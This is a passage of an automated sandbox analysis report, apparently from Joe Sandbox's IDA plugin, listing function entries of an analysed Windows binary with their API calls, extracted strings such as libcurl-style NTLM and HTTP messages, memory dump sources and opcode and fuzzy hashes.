    • Instruction Fuzzy Hash: B811B1B06113589FD745BFEA8D4ABED77A6DF08724F10004CF5018B381EB748A41D766
    APIs
    • _strlen.LIBCMT ref: 006AED79
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AEDEF
      • Part of subcall function 00683DA0: _strlen.LIBCMT ref: 00683DF9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: NTLM handshake failure (empty type-2 message)$ONj
    • API String ID: 3286693010-3125385695
    • Opcode ID: 99f7d923c5a7ac6dcfd472b1f7d24f68aec300f2bb1de603b7fc05c03a5c711f
    • Instruction ID: 4be43e63f176aca0bd8704e55c73e88580a0d1113d264f92999adab8cf397d18
    • Opcode Fuzzy Hash: 99f7d923c5a7ac6dcfd472b1f7d24f68aec300f2bb1de603b7fc05c03a5c711f
    • Instruction Fuzzy Hash: C9211DB5D00208EFCB40EF98D545BEEBBB6AF45304F10856AE81897351E7759B44CF91
    APIs
    • SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 006E62E8
    • _free.LIBCMT ref: 006E62F7
    • _free.LIBCMT ref: 006E6306
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$EnvironmentVariable
    • String ID: n
    • API String ID: 1464849758-2683921290
    • Opcode ID: 06d155fe66bfedac89943184636ddf8cf6fbea188e44d1f3d13873fb816cebe4
    • Instruction ID: 64d31b817dd6c795ad31c5b3ff29dea370171e51b0d67988cebd4fb0135026c1
    • Opcode Fuzzy Hash: 06d155fe66bfedac89943184636ddf8cf6fbea188e44d1f3d13873fb816cebe4
    • Instruction Fuzzy Hash: DB116D71C01259AEDF01AFAAD981AEEFFBABF18350F14407EE814B3211D6304A44CB94
    APIs
      • Part of subcall function 00666890: GetModuleHandleA.KERNEL32(kernel32), ref: 006668C9
    • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 006AA334
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
    • API String ID: 1646373207-3788156360
    • Opcode ID: ce0589064e6a80ebaaa3a056775d03a13d624a38a159054b84d8868a480cf84e
    • Instruction ID: 85c5419e329bb8b6e8c5bd165df150d6489c3efdc861ad0cc4876a1514230558
    • Opcode Fuzzy Hash: ce0589064e6a80ebaaa3a056775d03a13d624a38a159054b84d8868a480cf84e
    • Instruction Fuzzy Hash: 83113DB1D04254EADA50BBA9EC07B5936A69702304F40C26AA4059B2D2EB7C5E81CB97
    APIs
    • RegisterEventSourceW.ADVAPI32(00000000,?), ref: 00641A5C
    • ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00641A93
    • DeregisterEventSource.ADVAPI32(00000000), ref: 00641A9A
    Strings
    • %s failed w/err 0x%08lx, xrefs: 00641A3E
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Event$Source$DeregisterRegisterReport
    • String ID: %s failed w/err 0x%08lx
    • API String ID: 3235303502-1417036776
    • Opcode ID: 99f30e87072fb907410950665a1de630cf24eecf4663fb8c0abc97cd75084fad
    • Instruction ID: a52892e80b1fe102cf2c728c9c5385bfea5c0d17e446faf3e71354a625f93bf7
    • Opcode Fuzzy Hash: 99f30e87072fb907410950665a1de630cf24eecf4663fb8c0abc97cd75084fad
    • Instruction Fuzzy Hash: 48019271A41318BFDB20EF54CD4AFDAB769EB04710F004195FA08AB280DAB0AA84CB94
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    • Opcode ID: 3b05e0997ff22381ed1a2b7edc12014e15a3e93f77352b2339b1cc4bab82f9cd
    • Instruction ID: 0d68da233a7b1d8c110839b50fee53148b9c040bf70453700dd0049f2357af3f
    • Opcode Fuzzy Hash: 3b05e0997ff22381ed1a2b7edc12014e15a3e93f77352b2339b1cc4bab82f9cd
    • Instruction Fuzzy Hash: FFB10232E052859FEB158F68C891BEEBBE6EF55340F1481ABE8459B342D634DD02CB74
    APIs
    • getaddrinfo.WS2_32(?,?,?,?), ref: 0067D720
    • freeaddrinfo.WS2_32(00000000), ref: 0067D91A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067D977
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8freeaddrinfogetaddrinfo
    • String ID:
    • API String ID: 70213910-0
    • Opcode ID: 769d90e7279dfdeea3826775b4b63f411f5b4c3c8b502a143690d4d6b190e10d
    • Instruction ID: 6c9bc764d617e157d03cf198fef18978597cf2bef5328f366028670fde959c7f
    • Opcode Fuzzy Hash: 769d90e7279dfdeea3826775b4b63f411f5b4c3c8b502a143690d4d6b190e10d
    • Instruction Fuzzy Hash: C8A1F6B4D00209DFCB58DF98D585BEEB7B2BF48300F208599D81967351D739AE82CBA5
    APIs
    • _free.LIBCMT ref: 006E3753
    • _free.LIBCMT ref: 006E377C
    • SetEndOfFile.KERNEL32(00000000,006D8568,00000000,?,?,?,?,?,?,?,?,006D8568,?,00000000), ref: 006E37AE
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,006D8568,?,00000000,?,?,?,?,00000000,?), ref: 006E37CA
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFileLast
    • String ID:
    • API String ID: 1547350101-0
    • Opcode ID: 71e90d6587e80cbe1f5550f08fb663f48bbe48803b0f7c8700208acbad8c0860
    • Instruction ID: 6b374f143e6b2a6da4e72f01b732561319d5fbf5bd98d309a40f60cadb7271cc
    • Opcode Fuzzy Hash: 71e90d6587e80cbe1f5550f08fb663f48bbe48803b0f7c8700208acbad8c0860
    • Instruction Fuzzy Hash: 1C4126F2901395ABCF106BB6CC4AB9E77A7EF44320F140109F414A7391EB30CE508B69
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID:
    • API String ID: 4218353326-0
    • Opcode ID: 2c420e936858e49e510fb2bc624808625fed5656cc878ce2a03c7dd258d3e1a3
    • Instruction ID: 75c3706f4ca5280adf1d1bd25780417f1813e2b68b0f51e773649baad12c5dba
    • Opcode Fuzzy Hash: 2c420e936858e49e510fb2bc624808625fed5656cc878ce2a03c7dd258d3e1a3
    • Instruction Fuzzy Hash: 0341C2B0D04248EFDF10DFA8D8957EEBBB7AF06305F1441A8D81567202D635DB49CB92
    APIs
    • EnterCriticalSection.KERNEL32(?,?,0065AF71,?,0065B415,00000000), ref: 006522A2
    • Microsoft::WRL::Wrappers::HandleTraits::SRWLockExclusiveTraits::Unlock.VCCORLIBD ref: 006522E4
      • Part of subcall function 0067E1E0: CloseHandle.KERNEL32(?,?,?,0067E263), ref: 0067E1EA
    • closesocket.WS2_32(?), ref: 00652348
    • LeaveCriticalSection.KERNEL32(?,?,0065AF71,?,0065B415,00000000), ref: 006522CB
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CriticalHandleSectionTraits::$CloseEnterExclusiveFailureLeaveLockMicrosoft::UnlockWrappers::closesocket
    • String ID:
    • API String ID: 1633371138-0
    • Opcode ID: 1811bda86e6f52b995b0e5427fb1dffb24e59c4b147f9f6ada7111e99021b729
    • Instruction ID: 107d341cefb59887bd1da4c766eac6a477300715fd8ee5992ae43ce92970070e
    • Opcode Fuzzy Hash: 1811bda86e6f52b995b0e5427fb1dffb24e59c4b147f9f6ada7111e99021b729
    • Instruction Fuzzy Hash: 20415CB5D00204EFCB54EFA8D885A9DB7B6BF49300F118598E818AB351D735EE81CBD1
    APIs
      • Part of subcall function 006D0570: _free.LIBCMT ref: 006D057E
      • Part of subcall function 006DF696: WideCharToMultiByte.KERNEL32(006FA414,00000000,?,?,?,?,?,?,00000008,006FA414,00000000,?,00000003,006FAD78,00000028,006D36A9), ref: 006DF738
    • GetLastError.KERNEL32 ref: 006DF7C3
    • __dosmaperr.LIBCMT ref: 006DF7CA
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 006DF809
    • __dosmaperr.LIBCMT ref: 006DF810
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: 4cdc52a28bd6cdcf927bec1ed9bce06df0bbba5f2bed994fdc14b8657caf6c9b
    • Instruction ID: 57a642d806c1a4847bd4b4faf7680edb8bf6b9389efe8e85b73122bcc42e1ba5
    • Opcode Fuzzy Hash: 4cdc52a28bd6cdcf927bec1ed9bce06df0bbba5f2bed994fdc14b8657caf6c9b
    • Instruction Fuzzy Hash: 2C217771E0020AAFDB605FA59D81DAB77AFEF44368710853EF91A97350EB31EC0197A1
    APIs
    • GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
    • _free.LIBCMT ref: 006D8DC3
    • _free.LIBCMT ref: 006D8DF9
    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: cead8e2746561fd740354bd27569bb919d6f8cdda6b6b4b40a6b5d297e4acc27
    • Instruction ID: d5c07904ca77a536d8be2edb6ca391fbca31ff7c4131e425a50d766284ec3719
    • Opcode Fuzzy Hash: cead8e2746561fd740354bd27569bb919d6f8cdda6b6b4b40a6b5d297e4acc27
    • Instruction Fuzzy Hash: C6110C32E04201EEC66167756C8DDBB216BCFC1774725132BF314873E2DF258D1251A4
    APIs
    • GetLastError.KERNEL32(?,?,?,006CAAEA,006D9030,?,?,006C18AE,?,?,?,?,?,006352BD,006BD8C4,?), ref: 006D8EBD
    • _free.LIBCMT ref: 006D8F1A
    • _free.LIBCMT ref: 006D8F50
    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,006C18AE,?,?,?,?,?,006352BD,006BD8C4,?,?,006BD8C4), ref: 006D8F5B
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 78a118d727019e0d656c1dfb724be62768d8bc0581e5174394aa7a357f3b1172
    • Instruction ID: d28b4e323b4958cd9156091d59144747860632e62483988c2b501ef1af7a4d87
    • Opcode Fuzzy Hash: 78a118d727019e0d656c1dfb724be62768d8bc0581e5174394aa7a357f3b1172
    • Instruction Fuzzy Hash: 94110C32A04201EEC6626775AC89DBB225BD7C07B4725132BF214D73E1DF258D024258
    APIs
    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,006DCE3A,00000000,?,006E599E,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 006DCCEB
    • GetLastError.KERNEL32(?,006E599E,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,006DCE3A,00000000,00000104,?), ref: 006DCCF5
    • __dosmaperr.LIBCMT ref: 006DCCFC
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorFullLastNamePath__dosmaperr
    • String ID:
    • API String ID: 2398240785-0
    • Opcode ID: db81021ab534b0ef3bcceca6817c76957d98a25a6f756c65087cc4b75f2c0bf7
    • Instruction ID: 051c8e86a17cd4a02743d83f814c01f738fd70f1ef78ec52fdec17f543bb03c8
    • Opcode Fuzzy Hash: db81021ab534b0ef3bcceca6817c76957d98a25a6f756c65087cc4b75f2c0bf7
    • Instruction Fuzzy Hash: DFF0FF3160011ABBCB205FA6DC0499ABF6BFF453703108526B51986320DB31E811D7D0
    APIs
    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,006DCE3A,00000000,?,006E5929,00000000,00000000,006DCE3A,?,?,00000000,00000000,00000001), ref: 006DCD54
    • GetLastError.KERNEL32(?,006E5929,00000000,00000000,006DCE3A,?,?,00000000,00000000,00000001,00000000,00000000,?,006DCE3A,00000000,00000104), ref: 006DCD5E
    • __dosmaperr.LIBCMT ref: 006DCD65
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorFullLastNamePath__dosmaperr
    • String ID:
    • API String ID: 2398240785-0
    • Opcode ID: 0df9f02897d81b4606196e0042b8065a90f9f5edb48a8426d24a1345e68b52d1
    • Instruction ID: 9380f658880b5593f98783effa44ad72171e47cdb0e9c78d9bc78091c33b9322
    • Opcode Fuzzy Hash: 0df9f02897d81b4606196e0042b8065a90f9f5edb48a8426d24a1345e68b52d1
    • Instruction Fuzzy Hash: 87F0FF31A0051ABFCB605BA2DC04D96BF6BFE453703108526F519C6620DB31D811DBD0
    APIs
    • WriteConsoleW.KERNEL32(00000000,?,5C2E5C5C,00000000,00000000,?,006E3622,00000000,00000001,00000000,00000000,?,006D761D,00000000,?,00000000), ref: 006E64D6
    • GetLastError.KERNEL32(?,006E3622,00000000,00000001,00000000,00000000,?,006D761D,00000000,?,00000000,00000000,00000000,?,006D7B71,00000000), ref: 006E64E2
      • Part of subcall function 006E64A8: CloseHandle.KERNEL32(FFFFFFFE,006E64F2,?,006E3622,00000000,00000001,00000000,00000000,?,006D761D,00000000,?,00000000,00000000,00000000), ref: 006E64B8
    • ___initconout.LIBCMT ref: 006E64F2
      • Part of subcall function 006E646A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E6499,006E360F,00000000,?,006D761D,00000000,?,00000000,00000000), ref: 006E647D
    • WriteConsoleW.KERNEL32(00000000,?,5C2E5C5C,00000000,?,006E3622,00000000,00000001,00000000,00000000,?,006D761D,00000000,?,00000000,00000000), ref: 006E6507
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: a72bac000c318c1548f6d318eca60fa1511dfadd618abb0f5465eca7ba819814
    • Instruction ID: 79f0460a889f2f46e56bed813c5f8094da6babcd829d9635904814122f43e537
    • Opcode Fuzzy Hash: a72bac000c318c1548f6d318eca60fa1511dfadd618abb0f5465eca7ba819814
    • Instruction Fuzzy Hash: 6DF03036101296FFCFA22F96ED54ACA3F67FB187B1B008010FE1886171DA32C820DB95
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: Downgrades to HTTP/1.1!$\
    • API String ID: 0-71446353
    • Opcode ID: 837c31c93f8055eb7bdac75011801ee9764af1554ad5437e92e95f46c1d217ce
    • Instruction ID: c0ebc1e444849f6657fd2958c384d18c8a780e712bef13d0f83642646a5d26f9
    • Opcode Fuzzy Hash: 837c31c93f8055eb7bdac75011801ee9764af1554ad5437e92e95f46c1d217ce
    • Instruction Fuzzy Hash: 3C227BB4E00209DFDB64DF58C885BEAB7B2BF49304F1482A9E8195B381D7359992CF91
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066D388
    Strings
    • Failed to alloc scratch buffer!, xrefs: 0066D06D
    • We are completely uploaded and fine, xrefs: 0066D2C4
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Failed to alloc scratch buffer!$We are completely uploaded and fine
    • API String ID: 930174750-607151321
    • Opcode ID: 717ebcee3e0de4df0bf8c8a6e9cbc56126849c571419a67083dee1397b0cba07
    • Instruction ID: 369aa8de0354ddbba1860d93742a9e0de2f36cc87b04f91bc6f7d3375eef45e5
    • Opcode Fuzzy Hash: 717ebcee3e0de4df0bf8c8a6e9cbc56126849c571419a67083dee1397b0cba07
    • Instruction Fuzzy Hash: C812EB74A00209DFDB04CF98C495AEEB7F2BF49314F2481A9E849AB355D731AE42CF95
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 006B6BB1
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B6FCB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: 0123456789-
    • API String ID: 88142382-3850129594
    • Opcode ID: 1545f98ff9025fc5edb47e7b195f8e86a6b204a2eefce1ad5c05edb3aecf65d7
    • Instruction ID: 05922c261367ca92526d17a3c2b4a4e9757368f70ba31f3eaefc390bc24f6fc4
    • Opcode Fuzzy Hash: 1545f98ff9025fc5edb47e7b195f8e86a6b204a2eefce1ad5c05edb3aecf65d7
    • Instruction Fuzzy Hash: A8D1C9B5904259CFCB08CF84D494AFEBBB2BF49304F248549E8156B356C379E982CFA5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
